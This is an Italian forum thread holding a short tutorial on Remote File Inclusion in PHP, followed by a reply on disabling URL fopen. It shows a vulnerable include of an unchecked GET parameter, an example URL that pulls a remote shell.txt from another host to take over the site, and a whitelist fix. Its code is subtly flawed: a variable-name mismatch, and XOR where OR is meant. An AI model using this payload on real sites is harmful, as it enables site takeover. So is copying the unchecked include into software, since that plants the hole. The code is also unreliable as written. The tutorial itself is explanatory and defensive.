-
• God121.
User deleted
L'RFI ovvero il Remote File Inclusion serve, come dice il nome, ad includere un file da un nostro spazio hosting in un sito vittima.
Ovviamente i file non possono essere inclusi ovunque, infatti questo meccanismo sfrutta le debolezze umane:
Si puo includere infatti solo se il programmatore usa variabili non controllate per includere i file
ecco un esempio:
sito debole:CODICEhttp://overden.hellospace.net/pagina.php?include=ricerca.php
Codice php debole:CODICE$include=$_GET['include'];
include($includi);
In questo modo la pagina.php includerà ricerca.php ma se noi mettessimo nell'url:CODICEhttp://overden.hellospace.net/pagina.php?include=http://overden2.hellospace.net/shell.txt
In questo modo includeremo una shell e l'attaccante prendererà il pieno controllo del sito
Per evitare ciò possiamo modificare il codice php in questo modo:CODICE$include=$_GET['include'];
if($include == "file1.php" ^ $include == "file2.php" ^ $include == "file3.php"){
include($include);
}else{
echo "Pagina non valida!";
}
In questo modo se le pagine incluse non saranno file1, file2 o file3.php darà un errore.
Guida by Overden. -
meh..
User deleted
Il modo piu' facile e' disabilitare l'url fopen.
Certo e' che poi rimane la LFI.